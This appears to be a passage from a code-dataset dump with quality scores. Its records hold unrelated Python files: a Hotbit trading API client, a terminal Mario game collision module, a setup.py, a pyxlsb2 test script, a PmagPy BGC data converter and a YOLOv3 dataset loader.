    """Authenticated Hotbit trading endpoints (orders, balances)."""
    def __init__(
        self, key: str, secret: str, url: str = "https://api.hotbit.io", api_level: int = 2
    ):
        super().__init__(key=key, secret=secret, url=url, api_level=api_level)
        self.api_key = key
        self.secret_key = secret

    def create_limit_order(self, symbol: str, side: str, size: float, price: float) -> dict:
        """
        Place a limit order via ``order.put_limit``.

        :param symbol: a valid trading symbol code (Mandatory)
        :type: str
        :param side: place direction buy or sell (Mandatory)
        :type: str
        :param size: amount of base currency to buy or sell (Mandatory)
        :type: float
        :param price: price per base currency (Mandatory)
        :type: float
        :return: {
            "error": null,
            "result":
            {
                "id":8688803, #order-ID
                "market":"ETHBTC",
                "source":"web", #The source identification of data request
                "type":1, #Type of order pladement 1-limit order
                "side":2, #Identification of buyers and sellers 1-Seller,2-buyer
                "user":15731,
                "ctime":1526971722.164765, #Time of order establishment(second)
                "mtime":1526971722.164765, #Time of order update(second)
                "price":"0.080003",
                "amount":"0.4",
                "taker_fee":"0.0025",
                "maker_fee":"0",
                "left":"0.4",
                "deal_stock":"0",
                "deal_money":"0",
                "deal_fee":"0",
                "status":0,
                "fee_stock":"HTB", #Name of deductable token
                "alt_fee":"0.5", #The discount of deductable tokens
                "deal_fee_alt":"0.123" #Amount deducted
            },
            "id": 1521169460
        }
        """
        # NOTE(review): assert is stripped under ``python -O``; consider
        # raising ValueError for invalid ``side`` instead.
        assert side in ["buy", "sell"], "use side as 'buy' or 'sell' "
        params = {
            "api_key": self.api_key,
            "market": symbol,
            # Hotbit encodes buyer as 2 and seller as 1.
            "side": 2 if side == "buy" else 1,
            "amount": size,
            "price": price,
            "isfee": 0,
        }
        self._set_permission_level(2)
        return self._request(
            method="POST", uri="order.put_limit", params=params, timeout=5, auth=True
        )

    def get_balances(self, symbols: List[str]) -> dict:
        """
        Query balances for the given assets via ``balance.query``.

        :param symbols: symbols (Mandatory)
        :type: list
        :return:
        {
            'USDT': {
                'available': '20.38121558',
                'freeze': '0'
            },
            'BTC': {
                'available': '0.00000000',
                'freeze': '0'
            }
        }
        """
        self._set_permission_level(2)
        # NOTE(review): this single dict is shared by every missing symbol
        # inserted via setdefault — mutating one entry mutates them all.
        default_return = {"available": "0.00000000", "freeze": "0"}
        params = {"api_key": self.api_key, "assets": json.dumps(symbols)}
        result = self._request(method="GET", uri="balance.query", params=params, auth=True)
        # Ensure every requested symbol appears in the result, even if the
        # API omitted it (zero balance).
        for symbol in symbols:
            result.setdefault(symbol, default_return)
        return result
| from hotbit.base_request.base_request import HotbitBaseRestApi
import json
from typing import List
class TradeData(HotbitBaseRestApi):
def __init__(
self, key: str, secret: str, url: str = "https://api.hotbit.io", api_level: int = 2
):
super().__init__(key=key, secret=secret, url=url, api_level=api_level)
self.api_key = key
self.secret_key = secret
def create_limit_order(self, symbol: str, side: str, size: float, price: float) -> dict:
"""
:param symbol: a valid trading symbol code (Mandatory)
:type: str
:param side: place direction buy or sell (Mandatory)
:type: str
:param size: amount of base currency to buy or sell (Mandatory)
:type: float
:param price: price per base currency (Mandatory)
:type: float
:return: {
"error": null,
"result":
{
"id":8688803, #order-ID
"market":"ETHBTC",
"source":"web", #The source identification of data request
"type":1, #Type of order pladement 1-limit order
"side":2, #Identification of buyers and sellers 1-Seller,2-buyer
"user":15731,
"ctime":1526971722.164765, #Time of order establishment(second)
"mtime":1526971722.164765, #Time of order update(second)
"price":"0.080003",
"amount":"0.4",
"taker_fee":"0.0025",
"maker_fee":"0",
"left":"0.4",
"deal_stock":"0",
"deal_money":"0",
"deal_fee":"0",
"status":0,
"fee_stock":"HTB", #Name of deductable token
"alt_fee":"0.5", #The discount of deductable tokens
"deal_fee_alt":"0.123" #Amount deducted
},
"id": 1521169460
}
"""
assert side in ["buy", "sell"], "use side as 'buy' or 'sell' "
params = {
"api_key": self.api_key,
"market": symbol,
"side": 2 if side == "buy" else 1,
"amount": size,
"price": price,
"isfee": 0,
}
self._set_permission_level(2)
return self._request(
method="POST", uri="order.put_limit", params=params, timeout=5, auth=True
)
def get_balances(self, symbols: List[str]) -> dict:
"""
:param symbols: symbols (Mandatory)
:type: list
:return:
{
'USDT': {
'available': '20.38121558',
'freeze': '0'
},
'BTC': {
'available': '0.00000000',
'freeze': '0'
}
}
"""
self._set_permission_level(2)
default_return = {"available": "0.00000000", "freeze": "0"}
params = {"api_key": self.api_key, "assets": json.dumps(symbols)}
result = self._request(method="GET", uri="balance.query", params=params, auth=True)
for symbol in symbols:
result.setdefault(symbol, default_return)
return result
| en | 0.523864 | :param symbol: a valid trading symbol code (Mandatory) :type: str :param side: place direction buy or sell (Mandatory) :type: str :param size: amount of base currency to buy or sell (Mandatory) :type: float :param price: price per base currency (Mandatory) :type: float :return: { "error": null, "result": { "id":8688803, #order-ID "market":"ETHBTC", "source":"web", #The source identification of data request "type":1, #Type of order pladement 1-limit order "side":2, #Identification of buyers and sellers 1-Seller,2-buyer "user":15731, "ctime":1526971722.164765, #Time of order establishment(second) "mtime":1526971722.164765, #Time of order update(second) "price":"0.080003", "amount":"0.4", "taker_fee":"0.0025", "maker_fee":"0", "left":"0.4", "deal_stock":"0", "deal_money":"0", "deal_fee":"0", "status":0, "fee_stock":"HTB", #Name of deductable token "alt_fee":"0.5", #The discount of deductable tokens "deal_fee_alt":"0.123" #Amount deducted }, "id": 1521169460 } :param symbols: symbols (Mandatory) :type: list :return: { 'USDT': { 'available': '20.38121558', 'freeze': '0' }, 'BTC': { 'available': '0.00000000', 'freeze': '0' } } | 2.766735 | 3 |
src/collision_x.py | NishanthRachakonda/mario-bash | 0 | 6613970 | <filename>src/collision_x.py
import os
class Collision_horizontal(object):
"""Class to check x-axis collisions."""
def __init__(self):
pass
def check(self, dir, mario, pipes, boxes):
return (self.pipes(dir, mario, pipes) or self.boxes(dir, mario, boxes))
def pipes(self, dir, mario, pipes):
ans = False
for single_pipe in pipes:
ans = (ans or self.pipe(dir, mario, single_pipe))
return ans
def pipe(self, dir, mario, single_pipe):
if dir == 1 and mario.x + 2 < single_pipe.x and \
mario.x + 2 + mario.vel >= single_pipe.x and \
mario.y > single_pipe.h:
return True
elif dir == -1 and mario.x > single_pipe.x + 5 and \
mario.x - mario.vel <= single_pipe.x + 5 and \
mario.y > single_pipe.h:
return True
else:
return False
def boxes(self, dir, mario, boxes):
ans = False
for brick in boxes:
ans = (ans or self.brick(dir, mario, brick[0]))
return ans
def brick(self, dir, mario, brick):
if dir == 1 and mario.x + 2 < brick.x and \
mario.x + 2 + mario.vel >= brick.x and mario.y > brick.y and \
mario.y < brick.y + 2:
return True
elif dir == -1 and mario.x > brick.x + 9 and \
mario.x - mario.vel <= brick.x + 9 and mario.y > brick.y and \
mario.y < brick.y + 2:
return True
else:
return False
def tort(self, mario, set_tort, win):
for tortise in set_tort:
if mario.x + 2 >= tortise.x and mario.x <= tortise.x + 2 and \
mario.y == 27:
mario.health -= 1
tortise.remove_person(win)
tortise.create_person(win)
def goblin(self, mario, Goblin, win):
if mario.x + 2 >= Goblin.x and mario.x <= Goblin.x + 2 and \
(mario.y == 27 or mario.y == 26):
mario.health -= 1
Goblin.remove_person(win)
Goblin.create_person(win)
def coin(self, mario, coins, win):
for coin in coins:
if mario.x + 2 >= coin.x and mario.x <= coin.x and \
(mario.y == coin.y or mario.y - 1 == coin.y):
mario.score += 50
os.system("aplay -q ../assets/smb_coin.wav &")
coins.pop(coins.index(coin))
coin.remove_coin(win)
del coin
| <filename>src/collision_x.py
import os
class Collision_horizontal(object):
"""Class to check x-axis collisions."""
def __init__(self):
pass
def check(self, dir, mario, pipes, boxes):
return (self.pipes(dir, mario, pipes) or self.boxes(dir, mario, boxes))
def pipes(self, dir, mario, pipes):
ans = False
for single_pipe in pipes:
ans = (ans or self.pipe(dir, mario, single_pipe))
return ans
def pipe(self, dir, mario, single_pipe):
if dir == 1 and mario.x + 2 < single_pipe.x and \
mario.x + 2 + mario.vel >= single_pipe.x and \
mario.y > single_pipe.h:
return True
elif dir == -1 and mario.x > single_pipe.x + 5 and \
mario.x - mario.vel <= single_pipe.x + 5 and \
mario.y > single_pipe.h:
return True
else:
return False
def boxes(self, dir, mario, boxes):
ans = False
for brick in boxes:
ans = (ans or self.brick(dir, mario, brick[0]))
return ans
def brick(self, dir, mario, brick):
if dir == 1 and mario.x + 2 < brick.x and \
mario.x + 2 + mario.vel >= brick.x and mario.y > brick.y and \
mario.y < brick.y + 2:
return True
elif dir == -1 and mario.x > brick.x + 9 and \
mario.x - mario.vel <= brick.x + 9 and mario.y > brick.y and \
mario.y < brick.y + 2:
return True
else:
return False
def tort(self, mario, set_tort, win):
for tortise in set_tort:
if mario.x + 2 >= tortise.x and mario.x <= tortise.x + 2 and \
mario.y == 27:
mario.health -= 1
tortise.remove_person(win)
tortise.create_person(win)
def goblin(self, mario, Goblin, win):
if mario.x + 2 >= Goblin.x and mario.x <= Goblin.x + 2 and \
(mario.y == 27 or mario.y == 26):
mario.health -= 1
Goblin.remove_person(win)
Goblin.create_person(win)
def coin(self, mario, coins, win):
for coin in coins:
if mario.x + 2 >= coin.x and mario.x <= coin.x and \
(mario.y == coin.y or mario.y - 1 == coin.y):
mario.score += 50
os.system("aplay -q ../assets/smb_coin.wav &")
coins.pop(coins.index(coin))
coin.remove_coin(win)
del coin
| en | 0.878218 | Class to check x-axis collisions. | 3.609497 | 4 |
setup.py | guy4261/fight-churn | 151 | 6613971 | <filename>setup.py
import setuptools
import pkg_resources
import pathlib
# https://stackoverflow.com/questions/49689880/proper-way-to-parse-requirements-file-after-pip-upgrade-to-pip-10-x-x
with pathlib.Path('requirements.txt').open() as requirements_txt:
install_requires = [
str(requirement)
for requirement
in pkg_resources.parse_requirements(requirements_txt)
]
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="fightchurn",
version="1.0.0",
author="<NAME>",
author_email="<EMAIL>",
description="Code from the book Fighting Churn With Data",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/carl24k/fight-churn",
project_urls={
"Bug Tracker": "https://github.com/carl24k/fight-churn/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_data={'fightchurn' : ['fightchurn/listings/conf/*.json',
'fightchurn/listings/*/*.sql',
'fightchurn/datagen/*/*.csv',
'fightchurn/datagen/*/*.sql']},
include_package_data=True,
packages=['fightchurn',
'fightchurn.listings',
'fightchurn.listings.conf',
'fightchurn.listings.chap3',
'fightchurn.listings.chap5',
'fightchurn.listings.chap6',
'fightchurn.listings.chap7',
'fightchurn.listings.chap8',
'fightchurn.listings.chap9',
'fightchurn.listings.chap10',
'fightchurn.datagen',
'fightchurn.datagen.conf',
'fightchurn.datagen.schema'],
scripts=['fightchurn/run_churn_listing.py',
'fightchurn/datagen/churndb.py',
'fightchurn/datagen/churnsim.py'],
python_requires=">=3.9",
install_requires= install_requires
)
| <filename>setup.py
import setuptools
import pkg_resources
import pathlib
# https://stackoverflow.com/questions/49689880/proper-way-to-parse-requirements-file-after-pip-upgrade-to-pip-10-x-x
with pathlib.Path('requirements.txt').open() as requirements_txt:
install_requires = [
str(requirement)
for requirement
in pkg_resources.parse_requirements(requirements_txt)
]
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="fightchurn",
version="1.0.0",
author="<NAME>",
author_email="<EMAIL>",
description="Code from the book Fighting Churn With Data",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/carl24k/fight-churn",
project_urls={
"Bug Tracker": "https://github.com/carl24k/fight-churn/issues",
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_data={'fightchurn' : ['fightchurn/listings/conf/*.json',
'fightchurn/listings/*/*.sql',
'fightchurn/datagen/*/*.csv',
'fightchurn/datagen/*/*.sql']},
include_package_data=True,
packages=['fightchurn',
'fightchurn.listings',
'fightchurn.listings.conf',
'fightchurn.listings.chap3',
'fightchurn.listings.chap5',
'fightchurn.listings.chap6',
'fightchurn.listings.chap7',
'fightchurn.listings.chap8',
'fightchurn.listings.chap9',
'fightchurn.listings.chap10',
'fightchurn.datagen',
'fightchurn.datagen.conf',
'fightchurn.datagen.schema'],
scripts=['fightchurn/run_churn_listing.py',
'fightchurn/datagen/churndb.py',
'fightchurn/datagen/churnsim.py'],
python_requires=">=3.9",
install_requires= install_requires
)
| en | 0.534518 | # https://stackoverflow.com/questions/49689880/proper-way-to-parse-requirements-file-after-pip-upgrade-to-pip-10-x-x | 2.111011 | 2 |
test.py | cccs-jh/pyxlsb2 | 16 | 6613972 | import sys
import time
from pyxlsb2 import open_workbook
from pyxlsb2.formula import Formula
a = time.time()
print('Opening workbook... ', end='', flush=True)
with open_workbook(sys.argv[1]) as wb:
d = time.time() - a
print('Done! ({} seconds)'.format(d))
for s in wb.sheets:
print('Reading sheet {}...\n'.format(s), end='', flush=True)
a = time.time()
with wb.get_sheet_by_name(s.name) as sheet:
for row in sheet:
for cell in row:
formula_str = Formula.parse(cell.formula)
if formula_str._tokens:
try:
print(formula_str.stringify(wb))
except NotImplementedError as exp:
print('ERROR({}) {}'.format(exp, str(cell)))
except Exception:
print('ERROR ' + str(cell))
d = time.time() - a
print('Done! ({} seconds)'.format(d))
| import sys
import time
from pyxlsb2 import open_workbook
from pyxlsb2.formula import Formula
a = time.time()
print('Opening workbook... ', end='', flush=True)
with open_workbook(sys.argv[1]) as wb:
d = time.time() - a
print('Done! ({} seconds)'.format(d))
for s in wb.sheets:
print('Reading sheet {}...\n'.format(s), end='', flush=True)
a = time.time()
with wb.get_sheet_by_name(s.name) as sheet:
for row in sheet:
for cell in row:
formula_str = Formula.parse(cell.formula)
if formula_str._tokens:
try:
print(formula_str.stringify(wb))
except NotImplementedError as exp:
print('ERROR({}) {}'.format(exp, str(cell)))
except Exception:
print('ERROR ' + str(cell))
d = time.time() - a
print('Done! ({} seconds)'.format(d))
| none | 1 | 2.661118 | 3 | |
common.py | sile16/swarm | 0 | 6613973 | import socket
import dnsjob
server_port = 22300
server_pub_port = 22301
worker_port = 22400
logging_port = 22500
job_servers = {'dns':dnsjob.DNSJobServer()}
job_workers = {'dns':dnsjob.DNSJobWorker()}
job_loggers = {'dns':dnsjob.DNSJobLogger()}
def get_client_ip(server):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((server,server_pub_port))
worker_ip = s.getsockname()[0]
s.close()
return worker_ip
| import socket
import dnsjob
server_port = 22300
server_pub_port = 22301
worker_port = 22400
logging_port = 22500
job_servers = {'dns':dnsjob.DNSJobServer()}
job_workers = {'dns':dnsjob.DNSJobWorker()}
job_loggers = {'dns':dnsjob.DNSJobLogger()}
def get_client_ip(server):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((server,server_pub_port))
worker_ip = s.getsockname()[0]
s.close()
return worker_ip
| none | 1 | 2.572196 | 3 | |
programs/conversion_scripts/bgc_magic.py | yamamon75/PmagPy | 2 | 6613974 | #!/usr/bin/env python
"""
NAME
bgc_magic.py
DESCRIPTION
converts Berkeley Geochronology Center (BGC) format files to measurements format files
SYNTAX
bgc_magic.py [command line options]
OPTIONS
-h: prints the help message and quits.
-usr USER: Colon delimited list of analysts, default is ""
-ID: directory for input file if not included in -f flag
-f FILE: specify AUTOCORE format input file, required
-WD: directory to output files to (default : current directory)
-F FILE: specify output measurements file, default is measurements.txt
-Fsp FILE: specify output specimens.txt file, default is specimens.txt
-Fsa FILE: specify output samples.txt file, default is samples.txt
-Fsi FILE: specify output sites.txt file, default is sites.txt
-Flo FILE: specify output locations.txt file, default is locations.txt
-spc NUM : specify number of characters to designate a specimen, default = 0
-loc LOCNAME : specify location/study name
-site SITENAME : specify site name (if site name can be generated from sample name, see conventions list under the -ncn flag)
-ncn NCON: specify naming convention: default is #1 below
Sample naming convention:
[1] XXXXY: where XXXX is an arbitrary length site designation and Y
is the single character sample designation. e.g., TG001a is the
first sample from site TG001. [default]
[2] XXXX-YY: YY sample from site XXXX (XXX, YY of arbitary length)
[3] XXXX.YY: YY sample from site XXXX (XXX, YY of arbitary length)
[4-Z] XXXX[YYY]: YYY is sample designation with Z characters from site XXX
[5] site name same as sample
[6] site is entered under a separate column -- NOT CURRENTLY SUPPORTED
[7-Z] [XXXX]YYY: XXXX is site designation with Z characters with sample name XXXXYYYY
NB: all others you will have to customize your self
or e-mail <EMAIL>sd.edu for help.
-A: don't average replicate measurements
-mcd [SO-MAG,SO-SUN,SO-SIGHT...] supply how these samples were oriented
-v NUM : specify the volume in cc of the sample, default 12cc. Will use vol in data file if volume!=0 in file.
-tz: timezone in pytz library format. list of timzones can be found at http://pytz.sourceforge.net/. (default: US/Pacific)
-append: append output files to existing files, don't overwrite.
INPUT
BGC paleomag format file
"""
import sys
from pmagpy import convert_2_magic as convert
def do_help():
return __doc__
def main():
kwargs={}
if "-h" in sys.argv:
help(__name__)
sys.exit()
if "-usr" in sys.argv:
ind=sys.argv.index("-usr")
kwargs['user']=sys.argv[ind+1]
if '-WD' in sys.argv:
ind = sys.argv.index('-WD')
kwargs['dir_path'] = sys.argv[ind+1]
if '-ID' in sys.argv:
ind = sys.argv.index('-ID')
kwargs['input_dir_path'] = sys.argv[ind+1]
if '-F' in sys.argv:
ind = sys.argv.index("-F")
kwargs['meas_file'] = sys.argv[ind+1]
if '-Fsp' in sys.argv:
ind=sys.argv.index("-Fsp")
kwargs['spec_file']=sys.argv[ind+1]
if '-Fsa' in sys.argv:
ind = sys.argv.index("-Fsa")
kwargs['samp_file'] = sys.argv[ind+1]
if '-Fsi' in sys.argv: # LORI addition
ind=sys.argv.index("-Fsi")
kwargs['site_file']=sys.argv[ind+1]
if '-Flo' in sys.argv: # Kevin addition
ind=sys.argv.index("-Flo")
kwargs['loc_file']=sys.argv[ind+1]
if '-f' in sys.argv:
ind = sys.argv.index("-f")
kwargs['mag_file'] = sys.argv[ind+1]
if "-loc" in sys.argv:
ind = sys.argv.index("-loc")
kwargs['location'] = sys.argv[ind+1]
if "-site" in sys.argv:
ind = sys.argv.index("-site")
kwargs['site'] = sys.argv[ind+1]
if "-A" in sys.argv:
kwargs['noave'] = True
if "-mcd" in sys.argv:
ind = sys.argv.index("-mcd")
kwargs['meth_code'] = sys.argv[ind+1]
if "-v" in sys.argv:
ind = sys.argv.index("-v")
kwargs['volume'] = sys.argv[ind+1] # enter volume in cc, convert to m^3
if "-ncn" in sys.argv:
ind=sys.argv.index("-ncn")
kwargs['samp_con']=sys.argv[ind+1]
if "-spc" in sys.argv:
ind=sys.argv.index("-spc")
kwargs['specnum']=int(sys.argv[ind+1])
if '-tz' in sys.argv:
ind=sys.argv.index("-tz")
kwargs['timezone']=sys.argv[ind+1]
if '-append' in sys.argv:
kwargs['append']=True
convert.bgc(**kwargs)
if __name__ == "__main__":
main()
| #!/usr/bin/env python
"""
NAME
bgc_magic.py
DESCRIPTION
converts Berkeley Geochronology Center (BGC) format files to measurements format files
SYNTAX
bgc_magic.py [command line options]
OPTIONS
-h: prints the help message and quits.
-usr USER: Colon delimited list of analysts, default is ""
-ID: directory for input file if not included in -f flag
-f FILE: specify AUTOCORE format input file, required
-WD: directory to output files to (default : current directory)
-F FILE: specify output measurements file, default is measurements.txt
-Fsp FILE: specify output specimens.txt file, default is specimens.txt
-Fsa FILE: specify output samples.txt file, default is samples.txt
-Fsi FILE: specify output sites.txt file, default is sites.txt
-Flo FILE: specify output locations.txt file, default is locations.txt
-spc NUM : specify number of characters to designate a specimen, default = 0
-loc LOCNAME : specify location/study name
-site SITENAME : specify site name (if site name can be generated from sample name, see conventions list under the -ncn flag)
-ncn NCON: specify naming convention: default is #1 below
Sample naming convention:
[1] XXXXY: where XXXX is an arbitrary length site designation and Y
is the single character sample designation. e.g., TG001a is the
first sample from site TG001. [default]
[2] XXXX-YY: YY sample from site XXXX (XXX, YY of arbitary length)
[3] XXXX.YY: YY sample from site XXXX (XXX, YY of arbitary length)
[4-Z] XXXX[YYY]: YYY is sample designation with Z characters from site XXX
[5] site name same as sample
[6] site is entered under a separate column -- NOT CURRENTLY SUPPORTED
[7-Z] [XXXX]YYY: XXXX is site designation with Z characters with sample name XXXXYYYY
NB: all others you will have to customize your self
or e-mail <EMAIL>sd.edu for help.
-A: don't average replicate measurements
-mcd [SO-MAG,SO-SUN,SO-SIGHT...] supply how these samples were oriented
-v NUM : specify the volume in cc of the sample, default 12cc. Will use vol in data file if volume!=0 in file.
-tz: timezone in pytz library format. list of timzones can be found at http://pytz.sourceforge.net/. (default: US/Pacific)
-append: append output files to existing files, don't overwrite.
INPUT
BGC paleomag format file
"""
import sys
from pmagpy import convert_2_magic as convert
def do_help():
return __doc__
def main():
kwargs={}
if "-h" in sys.argv:
help(__name__)
sys.exit()
if "-usr" in sys.argv:
ind=sys.argv.index("-usr")
kwargs['user']=sys.argv[ind+1]
if '-WD' in sys.argv:
ind = sys.argv.index('-WD')
kwargs['dir_path'] = sys.argv[ind+1]
if '-ID' in sys.argv:
ind = sys.argv.index('-ID')
kwargs['input_dir_path'] = sys.argv[ind+1]
if '-F' in sys.argv:
ind = sys.argv.index("-F")
kwargs['meas_file'] = sys.argv[ind+1]
if '-Fsp' in sys.argv:
ind=sys.argv.index("-Fsp")
kwargs['spec_file']=sys.argv[ind+1]
if '-Fsa' in sys.argv:
ind = sys.argv.index("-Fsa")
kwargs['samp_file'] = sys.argv[ind+1]
if '-Fsi' in sys.argv: # LORI addition
ind=sys.argv.index("-Fsi")
kwargs['site_file']=sys.argv[ind+1]
if '-Flo' in sys.argv: # Kevin addition
ind=sys.argv.index("-Flo")
kwargs['loc_file']=sys.argv[ind+1]
if '-f' in sys.argv:
ind = sys.argv.index("-f")
kwargs['mag_file'] = sys.argv[ind+1]
if "-loc" in sys.argv:
ind = sys.argv.index("-loc")
kwargs['location'] = sys.argv[ind+1]
if "-site" in sys.argv:
ind = sys.argv.index("-site")
kwargs['site'] = sys.argv[ind+1]
if "-A" in sys.argv:
kwargs['noave'] = True
if "-mcd" in sys.argv:
ind = sys.argv.index("-mcd")
kwargs['meth_code'] = sys.argv[ind+1]
if "-v" in sys.argv:
ind = sys.argv.index("-v")
kwargs['volume'] = sys.argv[ind+1] # enter volume in cc, convert to m^3
if "-ncn" in sys.argv:
ind=sys.argv.index("-ncn")
kwargs['samp_con']=sys.argv[ind+1]
if "-spc" in sys.argv:
ind=sys.argv.index("-spc")
kwargs['specnum']=int(sys.argv[ind+1])
if '-tz' in sys.argv:
ind=sys.argv.index("-tz")
kwargs['timezone']=sys.argv[ind+1]
if '-append' in sys.argv:
kwargs['append']=True
convert.bgc(**kwargs)
if __name__ == "__main__":
main()
| en | 0.593717 | #!/usr/bin/env python NAME bgc_magic.py DESCRIPTION converts Berkeley Geochronology Center (BGC) format files to measurements format files SYNTAX bgc_magic.py [command line options] OPTIONS -h: prints the help message and quits. -usr USER: Colon delimited list of analysts, default is "" -ID: directory for input file if not included in -f flag -f FILE: specify AUTOCORE format input file, required -WD: directory to output files to (default : current directory) -F FILE: specify output measurements file, default is measurements.txt -Fsp FILE: specify output specimens.txt file, default is specimens.txt -Fsa FILE: specify output samples.txt file, default is samples.txt -Fsi FILE: specify output sites.txt file, default is sites.txt -Flo FILE: specify output locations.txt file, default is locations.txt -spc NUM : specify number of characters to designate a specimen, default = 0 -loc LOCNAME : specify location/study name -site SITENAME : specify site name (if site name can be generated from sample name, see conventions list under the -ncn flag) -ncn NCON: specify naming convention: default is #1 below Sample naming convention: [1] XXXXY: where XXXX is an arbitrary length site designation and Y is the single character sample designation. e.g., TG001a is the first sample from site TG001. [default] [2] XXXX-YY: YY sample from site XXXX (XXX, YY of arbitary length) [3] XXXX.YY: YY sample from site XXXX (XXX, YY of arbitary length) [4-Z] XXXX[YYY]: YYY is sample designation with Z characters from site XXX [5] site name same as sample [6] site is entered under a separate column -- NOT CURRENTLY SUPPORTED [7-Z] [XXXX]YYY: XXXX is site designation with Z characters with sample name XXXXYYYY NB: all others you will have to customize your self or e-mail <EMAIL>sd.edu for help. -A: don't average replicate measurements -mcd [SO-MAG,SO-SUN,SO-SIGHT...] supply how these samples were oriented -v NUM : specify the volume in cc of the sample, default 12cc. 
Will use vol in data file if volume!=0 in file. -tz: timezone in pytz library format. list of timzones can be found at http://pytz.sourceforge.net/. (default: US/Pacific) -append: append output files to existing files, don't overwrite. INPUT BGC paleomag format file # LORI addition # Kevin addition # enter volume in cc, convert to m^3 | 2.452102 | 2 |
models/yolov3/yolov3/dataset.py | yichenj/facegate | 0 | 6613975 | import tensorflow as tf
from absl.flags import FLAGS
@tf.function
def transform_targets_for_output(y_true, grid_size, anchor_idxs):
# y_true: (N, boxes, (x1, y1, x2, y2, class, best_anchor))
N = tf.shape(y_true)[0]
# y_true_out: (N, grid, grid, anchors, [x, y, w, h, obj, class])
y_true_out = tf.zeros(
(N, grid_size, grid_size, tf.shape(anchor_idxs)[0], 6))
anchor_idxs = tf.cast(anchor_idxs, tf.int32)
indexes = tf.TensorArray(tf.int32, 1, dynamic_size=True)
updates = tf.TensorArray(tf.float32, 1, dynamic_size=True)
idx = 0
for i in tf.range(N):
for j in tf.range(tf.shape(y_true)[1]):
if tf.equal(y_true[i][j][2], 0):
continue
anchor_eq = tf.equal(
anchor_idxs, tf.cast(y_true[i][j][5], tf.int32))
if tf.reduce_any(anchor_eq):
box = y_true[i][j][0:4]
box_xy = (y_true[i][j][0:2] + y_true[i][j][2:4]) / 2
anchor_idx = tf.cast(tf.where(anchor_eq), tf.int32)
grid_xy = tf.cast(box_xy // (1/grid_size), tf.int32)
# grid[y][x][anchor] = (tx, ty, bw, bh, obj, class)
indexes = indexes.write(
idx, [i, grid_xy[1], grid_xy[0], anchor_idx[0][0]])
updates = updates.write(
idx, [box[0], box[1], box[2], box[3], 1, y_true[i][j][4]])
idx += 1
# tf.print(indexes.stack())
# tf.print(updates.stack())
return tf.tensor_scatter_nd_update(
y_true_out, indexes.stack(), updates.stack())
def transform_targets(y_train, anchors, anchor_masks, size):
y_outs = []
grid_size = size // 32
# calculate anchor index for true boxes
anchors = tf.cast(anchors, tf.float32)
anchor_area = anchors[..., 0] * anchors[..., 1]
box_wh = y_train[..., 2:4] - y_train[..., 0:2]
box_wh = tf.tile(tf.expand_dims(box_wh, -2),
(1, 1, tf.shape(anchors)[0], 1))
box_area = box_wh[..., 0] * box_wh[..., 1]
intersection = tf.minimum(box_wh[..., 0], anchors[..., 0]) * \
tf.minimum(box_wh[..., 1], anchors[..., 1])
iou = intersection / (box_area + anchor_area - intersection)
anchor_idx = tf.cast(tf.argmax(iou, axis=-1), tf.float32)
anchor_idx = tf.expand_dims(anchor_idx, axis=-1)
y_train = tf.concat([y_train, anchor_idx], axis=-1)
for anchor_idxs in anchor_masks:
y_outs.append(transform_targets_for_output(
y_train, grid_size, anchor_idxs))
grid_size *= 2
return tuple(y_outs)
def transform_images(x_train, size):
x_train = tf.image.resize(x_train, (size, size))
x_train = x_train / 255
return x_train
def parse_yolo_dataset(line, image_path):
line = tf.strings.split(line, ',')
image_file = tf.strings.reduce_join([image_path, line[0]], separator='/')
bbx = tf.strings.to_number(tf.strings.split(line[1:], ' '), out_type=tf.float32)
y = bbx.to_tensor()
paddings = [[0, FLAGS.yolo_max_boxes - tf.shape(y)[0]], [0, 0]]
y = tf.pad(y, paddings)
return image_file, y
def parse_yolo_image(image, label, size):
image = tf.io.read_file(image)
image = tf.io.decode_image(image, channels=3, expand_animations=False)
image = tf.image.resize(image, (size, size))
return image, label
def load_yolo_dataset(image_path, label_file, size=416, shuffle=False, shuffle_buffer_size=512):
dataset = tf.data.TextLineDataset(label_file)
if shuffle:
dataset = dataset.shuffle(buffer_size=shuffle_buffer_size)
dataset = dataset.map(lambda x: parse_yolo_dataset(x, image_path))
dataset = dataset.map(lambda x, y: parse_yolo_image(x, y, size))
return dataset
def get_dataset_size(label_file):
with open(label_file, 'r') as f:
for i, _ in enumerate(f):
pass
return i + 1
| import tensorflow as tf
from absl.flags import FLAGS
@tf.function
def transform_targets_for_output(y_true, grid_size, anchor_idxs):
# y_true: (N, boxes, (x1, y1, x2, y2, class, best_anchor))
N = tf.shape(y_true)[0]
# y_true_out: (N, grid, grid, anchors, [x, y, w, h, obj, class])
y_true_out = tf.zeros(
(N, grid_size, grid_size, tf.shape(anchor_idxs)[0], 6))
anchor_idxs = tf.cast(anchor_idxs, tf.int32)
indexes = tf.TensorArray(tf.int32, 1, dynamic_size=True)
updates = tf.TensorArray(tf.float32, 1, dynamic_size=True)
idx = 0
for i in tf.range(N):
for j in tf.range(tf.shape(y_true)[1]):
if tf.equal(y_true[i][j][2], 0):
continue
anchor_eq = tf.equal(
anchor_idxs, tf.cast(y_true[i][j][5], tf.int32))
if tf.reduce_any(anchor_eq):
box = y_true[i][j][0:4]
box_xy = (y_true[i][j][0:2] + y_true[i][j][2:4]) / 2
anchor_idx = tf.cast(tf.where(anchor_eq), tf.int32)
grid_xy = tf.cast(box_xy // (1/grid_size), tf.int32)
# grid[y][x][anchor] = (tx, ty, bw, bh, obj, class)
indexes = indexes.write(
idx, [i, grid_xy[1], grid_xy[0], anchor_idx[0][0]])
updates = updates.write(
idx, [box[0], box[1], box[2], box[3], 1, y_true[i][j][4]])
idx += 1
# tf.print(indexes.stack())
# tf.print(updates.stack())
return tf.tensor_scatter_nd_update(
y_true_out, indexes.stack(), updates.stack())
def transform_targets(y_train, anchors, anchor_masks, size):
y_outs = []
grid_size = size // 32
# calculate anchor index for true boxes
anchors = tf.cast(anchors, tf.float32)
anchor_area = anchors[..., 0] * anchors[..., 1]
box_wh = y_train[..., 2:4] - y_train[..., 0:2]
